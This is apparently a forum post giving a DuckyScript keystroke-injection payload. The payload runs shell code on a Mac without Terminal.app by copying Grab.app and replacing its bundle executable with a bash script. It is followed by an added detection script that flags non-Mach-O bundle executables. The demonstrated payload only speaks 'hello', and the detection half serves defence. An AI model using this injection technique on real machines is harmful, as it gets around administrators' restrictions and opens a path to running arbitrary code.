
Mac Payload Without Using Terminal.app



Here is my new payload to attack a Mac without using terminal.

I got this idea after seeing how, using good management software, an administrator can remove an app from a Mac (one such application being Terminal). This eliminated a lot of the attacks I had previously made work against a Mac. So I got to thinking and poking around inside applications, and it turns out you can replace the contents of certain files in a Mac application and run scripts. You simply open the right file, replace its contents with your code, and then run the application. The app no longer functions normally, but by making a duplicate of the app in another folder and editing that one, you can run your attack code without completely losing the original files, all without Terminal. I used Grab.app for this, but almost any app could be used; I wanted to find one that was not likely to have anything similarly named around it because of the way I select the application to copy it.


Here is the code; its outcome is simply to "say hello" (so if you test it, have the volume up a bit). I have not really played with the delays yet; they are all over the place and some are too high, but that makes it a bit easier to see what is going on. This is not a final project but rather a starting point to spark some new ideas. Have fun, but please use this responsibly.

DELAY 2000
COMMAND SPACE
DELAY 300
STRING /Applications/Utilities/
DELAY 200
ENTER
DELAY 400
STRING g
DELAY 500
COMMAND c
DELAY 300
COMMAND SPACE
DELAY 300
STRING /Users/Shared/
DELAY 400
ENTER
DELAY 400
COMMAND v
DELAY 2000
COMMAND SPACE
DELAY 300
STRING /Users/Shared/Grab.app/Contents/MacOS/
DELAY 600
ENTER
DELAY 500
TAB
DELAY 500
COMMAND o
DELAY 500
COMMAND a
DELAY 500
STRING #!/bin/bash
DELAY 400
ENTER
DELAY 300
STRING say
DELAY 300
ESCAPE
DELAY 300
SPACE
DELAY 300
STRING hello
DELAY 300
COMMAND s
DELAY 400
COMMAND q
DELAY 500
COMMAND SPACE
DELAY 300
STRING /Users/Shared/Grab.app
DELAY 400
ENTER
COMMAND w
COMMAND w
COMMAND w
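The technique above works because the main executable under an app bundle's Contents/MacOS can be swapped for a shell script and the copied bundle still launches. From the defender's side, the tell-tale is that the file in Contents/MacOS is no longer a Mach-O binary. Below is an added detection example (my own code, not part of the original post or of any Hak5 tool) that scans a directory of *.app bundles and reports any Contents/MacOS executable whose first four bytes are not a Mach-O or universal-binary magic. The demo bundles it builds in a temp directory are constructed for illustration; the names Good.app and Evil.app are placeholders. On a real Mac you would pair this with `codesign --verify --deep --strict "<bundle>"`, since replacing the executable breaks the bundle's code signature.

```shell
#!/bin/sh
# Added example: find app bundles whose Contents/MacOS executables are not Mach-O.
# Portable POSIX sh; uses only od, mktemp, printf and chmod.

# Return 0 if the file starts with a Mach-O (32/64-bit, either endianness)
# or fat/universal magic, else 1. An empty or missing file returns 1.
is_macho() {
    magic=$(od -An -N4 -tx1 "$1" 2>/dev/null | tr -d ' \n')
    case "$magic" in
        feedface|cefaedfe|feedfacf|cffaedfe|cafebabe|bebafeca) return 0 ;;
        *) return 1 ;;
    esac
}

# Print the path of every regular file under <bundle>/Contents/MacOS that is
# not a Mach-O binary. Returns 0 if the bundle is clean, 1 if anything was
# flagged, 2 if the bundle has no Contents/MacOS directory at all.
scan_bundle() {
    dir="$1/Contents/MacOS"
    [ -d "$dir" ] || { echo "no Contents/MacOS in $1" >&2; return 2; }
    bad=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if ! is_macho "$f"; then
            echo "$f"
            bad=1
        fi
    done
    return $bad
}

# Scan every *.app directly under <dir>; prints one flagged path per line.
scan_dir() {
    for app in "$1"/*.app; do
        [ -d "$app" ] || continue
        scan_bundle "$app" || true   # keep going after a flagged bundle
    done
}

# Constructed demo fixture: one bundle with a (minimal) 64-bit Mach-O header,
# one whose executable has been replaced by a shell script, as in the post.
# Prints the temp directory that holds both bundles.
make_demo() {
    root=$(mktemp -d)
    mkdir -p "$root/Good.app/Contents/MacOS" "$root/Evil.app/Contents/MacOS"
    # 0xcffaedfe is MH_MAGIC_64 as it appears on disk on little-endian Macs
    printf '\317\372\355\376' > "$root/Good.app/Contents/MacOS/Good"
    printf '#!/bin/bash\nsay hello\n' > "$root/Evil.app/Contents/MacOS/Evil"
    chmod +x "$root"/*.app/Contents/MacOS/*
    echo "$root"
}

# Stand-alone run: build the fixture, scan it, show what gets flagged.
if [ "${1:-}" = "--demo" ]; then
    demo=$(make_demo)
    echo "scanning $demo"
    scan_dir "$demo"
    rm -rf "$demo"
fi
```

Run it with `--demo` to see only Evil.app/Contents/MacOS/Evil reported, or point `scan_dir` at /Users/Shared or /Applications. The magic-byte check is deliberately cheap and signature-independent, so it also catches bundles that were never signed in the first place; a signed-but-modified bundle is caught more reliably by codesign, which this check complements rather than replaces.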
